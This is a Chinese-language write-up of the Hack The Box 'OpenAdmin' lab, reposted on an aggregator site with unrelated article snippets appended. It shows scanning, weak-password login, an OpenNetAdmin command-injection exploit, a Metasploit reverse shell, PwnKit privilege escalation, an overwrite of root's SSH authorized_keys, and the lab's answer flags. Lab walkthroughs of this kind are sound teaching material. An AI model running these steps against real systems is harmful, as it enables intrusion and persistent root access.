HTB:OpenAdmin[WriteUP]

目录

连接至HTB服务器并启动靶机

使用nmap对靶机TCP端口进行开放扫描

继续使用nmap对靶机22、80端口进行脚本、服务扫描

使用Dirbuster对靶机网页路径进行递归扫描

​编辑

尝试在searchsploit中搜索改WebAPP漏洞

横向移动(其实没有横)

启动Metasploit

特权提升

USER_FLAG:8dc61b4d9177f837003a7c2e18cecb6e

ROOT_FLAG:2f88f1cd2398dc8b2fb60afc559b22e0


连接至HTB服务器并启动靶机

靶机IP:10.10.10.171

分配IP:10.10.16.7


使用nmap对靶机TCP端口进行开放扫描

nmap -p- -sS --min-rate=1500 -T5 -Pn 10.10.10.171

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nmap -p- -sS --min-rate=1500 -T5 -Pn 10.10.10.171
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-12 01:10 EST
Warning: 10.10.10.171 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.171 (10.10.10.171)
Host is up (0.092s latency).
Not shown: 60052 closed tcp ports (reset), 5481 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 68.02 seconds

继续使用nmap对靶机22、80端口进行脚本、服务扫描

nmap -p 22,80 -sCV 10.10.10.171


使用Dirbuster对靶机网页路径进行递归扫描

使用合适的字典,这里扫到一个登录页面

使用浏览器直接访问改页面,直接一个弱口令就进来了

进入后台,在面板左上角可以看到当前的OpenNetAdmin版本为:18.1.1

尝试在searchsploit中搜索改WebAPP漏洞

searchsploit opennetadmin 

查看该EXP代码

cat 47691.sh

经过简单代码审计,这里将url变量修改为靶机登录URL即可

直接运行该脚本getshell

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ./47691.sh
$ whoami
www-data
$ ls
config
config_dnld.php
dcm.php
images
include
index.php
local
login.php
logout.php
modules
plugins
winc
workspace_plugins


横向移动(其实没有横)

查看系统内的用户

cat /etc/passwd

由输出可知,允许交互登录的用户有:joanna、jimmy、root

(截这张图后过了一小时试了MSF提权)本来想着这里手工提权的,但是后来MSF提权还挺顺利


启动Metasploit

msfconsole

搜索opennetadmin相关的利用模块

search opennetadmin

使用该模块

use exploit/unix/webapp/opennetadmin_ping_cmd_injection

这里需要配置好参数:RHOSTS、TARGETURI、URIPATH、LHOST、LPORT、PAYLOAD

注意这里的PAYLOAD我标红了,一定要使用符合系统x64的payload不然无法反弹shell!!!

这里发送PAYLOAD超级慢,应该是正常现象。。。吧?


特权提升

拿到了low权的Meterpreter之后切换到提权扫描模块

use post/multi/recon/local_exploit_suggester

这里经过多次试错后,成功利用linux/local/cve_2021_4034_pwnkit_lpe_pkexec模块提权

其实到了这一步,利用Meterpreter的search功能已经能查看两个flag了


但是此时出现了一个我感觉很奇怪的问题,明明在Meterpreter中执行getuid命令

回显为:Server username: root

但是使用shell命令切换到终端后,执行whoami命令却显示www-data

meterpreter > getuid
Server username: root
meterpreter > shell
Process 9064 created.
Channel 4 created.
whoami
www-data

于是我尝试在本地使用ssh-keygen生成一对密钥对,将靶机的authorized_keys文件进行替换

这里将root.pub文件名修改为:authorized_keys

Meterpreter中进入/root/.ssh目录下

meterpreter > cd /root/.ssh
meterpreter > ls
Listing: /root/.ssh
===================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100600/rw-------  0     fil   2019-11-21 08:45:07 -0500  authorized_keys

将authorized_keys删除

rm authorized_keys

meterpreter > rm authorized_keys
meterpreter > ls
Listing: /root/.ssh
===================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----

                                                                                              

将我们用ssh-keygen生成的authorized_keys文件上传至靶机

upload authorized_keys

meterpreter > upload authorized_keys
[*] Uploading  : /home/kali/Desktop/temp/authorized_keys -> authorized_keys
[*] Uploaded -1.00 B of 399.00 B (-0.25%): /home/kali/Desktop/temp/authorized_keys -> authorized_keys
[*] Completed  : /home/kali/Desktop/temp/authorized_keys -> authorized_keys
meterpreter > ls
Listing: /root/.ssh
===================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100644/rw-r--r--  399   fil   2024-11-12 03:40:14 -0500  authorized_keys

攻击机通过SSH私钥文件直接通过SSH服务登录ROOT用户

ssh -i root root@10.10.10.171

查找user_flag、root_flag位置并查看其内容

root@openadmin:~# find / -name 'user.txt'
/home/joanna/user.txt
root@openadmin:~# find / -name 'root.txt'
/root/root.txt
root@openadmin:~# cat /home/joanna/user.txt
8dc61b4d9177f837003a7c2e18cecb6e
root@openadmin:~# cat /root/root.txt
2f88f1cd2398dc8b2fb60afc559b22e0

USER_FLAG:8dc61b4d9177f837003a7c2e18cecb6e

ROOT_FLAG:2f88f1cd2398dc8b2fb60afc559b22e0

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.xdnf.cn/news/13007.html

如若内容造成侵权/违法违规/事实不符,请联系一条长河网进行投诉反馈,一经查实,立即删除!

相关文章

IO作业5

设置双信号实现交替生产者线程和消费者线程 #include <myhead.h> int n0; pthread_mutex_t fastmutex;//定义互斥锁 pthread_cond_t cond;//定义条件变量 pthread_cond_t cond2; void *product() {int i;for(i0;i<10;i){n;printf("我生产了一台特斯拉n%d\n"…

Web3.0安全开发实践|BNB链安全开发,这10大实用tips一定要收藏

BNB Chain是Web3世界中最受欢迎的区块链之一&#xff0c;其费用合理、交易迅速以及项目生态系统丰富几大原因吸引了广大用户。与任何的区块链都一样&#xff0c;BNB Chain上的开发者在开发过程中首先考虑的应该是安全问题&#xff1a;因为任何资金的损失都会导致用户对协议及平…

QT开发笔记之小知识

QCoreApplication::aboutToQuit 主事件循环退出前发出的信号&#xff0c;是程序退出前等待QT线程退出回收资源的神器。 官方帮助文档 [signal] void QCoreApplication::aboutToQuit() 该信号在应用程序即将退出主事件循环时发出&#xff0c;例如&#xff1a;当事件循环级别降至…

插入排序(C语言)

直接插入排序的基本思想&#xff1a;把待排序的记录按其关键码值的大小逐个插入到一个已经排好序的有序序列中&#xff0c;直到所有的记录插入完为止&#xff0c;得到一个新的有序序列 。 一、步骤 1.给定一个乱序的数组&#xff0c;如 从第一个元素开始排序&#xff0c;当只…

文心一言 VS 讯飞星火 VS chatgpt (389)-- 算法导论25.1 2题

二、为什么要求对于所有的 1 ⩽ i ⩽ n 1⩽i⩽n 1⩽i⩽n&#xff0c;有 w i i 0 w_{ii}0 wii​0 &#xff1f;如果要写代码&#xff0c;请用go语言。 文心一言&#xff1a; 在许多数学和计算应用中&#xff0c;要求矩阵 W W W 的对角线元素 w i i 0 w_{ii} 0 wii​0 是…

Java多线程详解⑦(全程干货!!!)内存可见性 || volatile || JMM || wait notify notifyAll

这里是Themberfue 在上一节中&#xff0c;我们讨论了死锁的概念&#xff0c;产生的场景 &#xff0c;产生的必要条件...... 内存可见性 我们先来看一段百度百科关于 "内存可见性" 的解释 "内存可见性" 就是造成线程安全问题的原因之一 如果是单纯地看…

安装双系统(linux操作系统(debian)安装)

参考博客&#xff1a;戴尔服务器安装Debian11过程_戴尔t130安装debian-CSDN博客 一.腾出一个50G以上的空间&#xff0c;准备装操作系统 1.底部搜索计算机管理&#xff0c;选择磁盘管理 本人已预留400GB磁盘空间安装ubuntu系统&#xff0c;若没有预留空间&#xff0c;则可以选…

心系天下三星W25:记录盛世影像 见证华彩时光

悠然岁月中&#xff0c;被定格的瞬间总是历久弥新。心系天下三星W25以传世经典之姿跃然于掌中&#xff0c;将精致外形与精湛工艺合二为一&#xff0c;彰显出持有者的高雅气质。同时&#xff0c;强悍的影像系统则使之成为光影艺术的记录者&#xff0c;无论是捕捉人生风华&#x…

修改msyql用户密码及更新mysql密码策略

查看mysql中初始的密码策略 SHOW VARIABLES LIKE validate_password% 2. 修改默认密码策略 -- 0 或者 LOW 只验证长度-- 1 或者 MEDIUM 验证长度、数字、大小写、特殊字符-- 2 或者 STRONG 验证长度、数字、大小写、特殊字符、字典文件set global validate_password.policy0;…

f.lux电脑屏幕护眼神器,告别熬夜伤眼

前言 之前分享了一款护眼宝&#xff0c;也是可以调节屏幕色温&#xff0c;但是都是需要手动调节 今天分享一款通过智能调节屏幕亮度&#xff0c;减少长时间使用电脑对眼睛的伤害。它可以根据环境光线和用户的使用习惯&#xff0c;自动调整屏幕亮度&#xff0c;确保用户在不同时…

小家电器产品三维动画渲染怎么做快一些?

在快节奏的市场竞争中&#xff0c;快速制作小家电器产品的三维动画渲染显得尤为重要。本文将为您揭示如何高效完成这一过程&#xff0c;让您的产品以最直观的方式吸引消费者的目光。 一、电器产品动画渲染需要软件 原文出自 电器产品三维动画渲染怎么做-电器产品3D动画渲染需要…

Cesium基础-(Entity)-(model )

里边包含Vue、React框架代码详细步骤、以及代码详细解释 公众号:GISer世界 三维模型地址 :https://download.csdn.net/download/weixin_44857463/89986869 效果: 以下是Cesium中Model的属性和方法: 属性 属性名称类型默认值描述urlstring | Resource.gltf或.glb文件的URLb…

RAG综述:《A Comprehensive Survey of Retrieval-Augmented Generation (RAG)》

来源于《A Comprehensive Survey of Retrieval-Augmented Generation (RAG): Evolution, Current Landscape and Future Directions》 一、RAG所解决的问题 如何有效地从外部知识源检索相关信息&#xff0c;如何将这些信息无缝地融入到生成文本中&#xff0c;以及如何在保证生…

带你读懂什么是AI Agent智能体

一、智能体的定义与特性 定义&#xff1a;智能体是一个使用大语言模型&#xff08;LLM&#xff09;来决定应用程序控制流的系统。然而&#xff0c;智能体的定义并不唯一&#xff0c;不同人有不同的看法。Langchain的创始人Harrison Chase从技术角度给出了定义&#xff0c;但更…

数据库类型介绍

1. 关系型数据库&#xff08;RDBMS&#xff09; 关系型数据库是最常见的一类数据库&#xff0c;它们通过表&#xff08;Table&#xff09;来存储数据&#xff0c;表之间通过关系&#xff08;如主键和外键&#xff09;来关联。 • MySQL&#xff1a;开源的关系型数据库管理系统&…

【红帽Linux】简述Linux文件系统结构

原创 厦门微思网络 Linux 文件系统结构划分清晰、功能明确&#xff0c;每个目录都有特定的用途。以下是各个主要目录的介绍&#xff1a; n/bin: 包含系统启动和单用户模式下的基本命令的二进制文件&#xff0c;例如常见的基本命令 ls 和 cp。 n/boot: 保存与系统启动相关的文…

分贝通上线“在线比价”机制,帮助企业在差旅采购中持续获得低价资源

在企业差旅采购中,如何在不断波动的供求关系价格中保持相对价格优势,是企业进行成本管理必须面临的主要挑战之一。差旅平台分贝通通过其“单位降本”产品逻辑,在差旅管理中实现了显著的成本优化效果,帮助3000合作企业在高频支出场景中取得了可持续的低价优势。 差旅平台分贝通…

MySQL 如何用C语言连接

✨✨✨励志成为超级技术宅 ✨✨✨ 本文主要讲解在Linux服务器上&#xff0c;如何使用c语言MySQL库的接口来对MySQL数据库进行操作&#xff0c;如果没有服务器安装MySQL&#xff0c;也可以先学学看怎么用c语言mysql库的接口&#xff0c;还是比较容易的了。(●☌◡☌●)。那么开…

Hadoop生态圈框架部署(六)- HBase完全分布式部署

文章目录 前言一、Hbase完全分布式部署&#xff08;手动部署&#xff09;1. 下载Hbase2. 上传安装包3. 解压HBase安装包4. 配置HBase配置文件4.1 修改hbase-env.sh配置文件4.2 修改hbase-site.xml配置文件4.3 修改regionservers配置文件4.4 删除hbase中slf4j-reload4j-1.7.33.j…

OpenCV与AI深度学习 | 基于YoloV11自定义数据集实现车辆事故检测(有源码,建议收藏!)

本文来源公众号“OpenCV与AI深度学习”&#xff0c;仅用于学术分享&#xff0c;侵权删&#xff0c;干货满满。 原文链接&#xff1a;基于YoloV11自定义数据集实现车辆事故检测 在智能交通系统领域&#xff0c;实时检测车辆事故的能力变得越来越重要。该项目利用先进的计算机视…